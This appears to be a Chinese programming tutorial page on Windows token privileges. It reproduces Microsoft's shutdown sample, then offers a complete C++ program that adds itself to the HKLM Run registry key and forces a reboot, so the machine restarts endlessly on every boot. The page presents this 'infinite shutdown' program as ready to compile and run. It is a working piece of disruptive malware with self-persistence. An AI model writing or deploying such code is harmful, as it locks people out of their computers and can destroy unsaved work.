Heim > Artikel > Backend-Entwicklung > C/C++ unendliches Herunterfahren (Beispiel für Privilegieneskalation)
在windows系统中,当涉及本进程去操作其他进程,或者要用shutdown这些高危命令的时候就涉及提权,下面是MSDN的列子
提权三兄弟
OpenProcessToken
LookupPrivilegevalue
AdjustTokenPrivileges
我们用下面这个MSDN的代码来做一个注册表无限关机的列子
#include <windows.h> #pragma comment(lib, "user32.lib") #pragma comment(lib, "advapi32.lib") BOOL MySystemShutdown() { HANDLE hToken; TOKEN_PRIVILEGES tkp; // Get a token for this process. if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) return( FALSE ); // Get the LUID for the shutdown privilege. LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &tkp.Privileges[0].Luid); tkp.PrivilegeCount = 1; // one privilege to set tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; // Get the shutdown privilege for this process. AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, (PTOKEN_PRIVILEGES)NULL, 0); if (GetLastError() != ERROR_SUCCESS) return FALSE; // Shut down the system and force all applications to close. if (!ExitWindowsEx(EWX_SHUTDOWN | EWX_FORCE, SHTDN_REASON_MAJOR_OPERATINGSYSTEM | SHTDN_REASON_MINOR_UPGRADE | SHTDN_REASON_FLAG_PLANNED)) return FALSE; //shutdown was successful return TRUE; }
上面是MSDN的代码,下面给出无限关机的代码(含详细注释)
// shutdownDemo.cpp : 定义控制台应用程序的入口点。 // #include "stdafx.h" #include <windows.h> BOOL MySystemShutdown() { HANDLE hToken; //用于操作的句柄 TOKEN_PRIVILEGES tkp; //用于存放特定信息 // Get a token for this process. if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) return(FALSE); // Get the LUID for the shutdown privilege. //如果要提权的话要在下面这两个函数提权 LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &tkp.Privileges[0].Luid); tkp.PrivilegeCount = 1; // one privilege to set tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; // Get the shutdown privilege for this process. AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, (PTOKEN_PRIVILEGES)NULL, 0); if (GetLastError() != ERROR_SUCCESS) return FALSE; // Shut down the system and force all applications to close. if (!ExitWindowsEx(EWX_REBOOT| EWX_FORCE, SHTDN_REASON_MAJOR_OPERATINGSYSTEM | SHTDN_REASON_MINOR_UPGRADE | SHTDN_REASON_FLAG_PLANNED)) return FALSE; //shutdown was successful return TRUE; } int _tmain(int argc, _TCHAR* argv[]) { getchar(); HKEY hKey = { 0 }; /*LONG RegOpenKeyEx( HKEY hKey, // 需要打开的主键的名称 LPCTSTR lpSubKey, //需要打开的子键的名称 DWORD ulOptions, // 保留,设为0 REGSAM samDesired, // 安全访问标记,也就是权限 PHKEY phkResult // 得到的将要打开键的句柄 )*/ RegOpenKeyExA(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_WRITE,&hKey); //打开一个指定的注册表键 char path[MAX_PATH] = { 0 }; GetModuleFileNameA(nullptr, path, MAX_PATH); //获取当前文件路径 RegSetValueEx(hKey, "ShutDown", 0, REG_SZ, (byte*)path, strlen(path)); MySystemShutdown(); return 0; }
如果出现下面问题
请修改字符集如下
下面看看运行结果!
以上就是 C/C++无限关机(提权例子)的内容,更多相关内容请关注PHP中文网(www.php.cn)!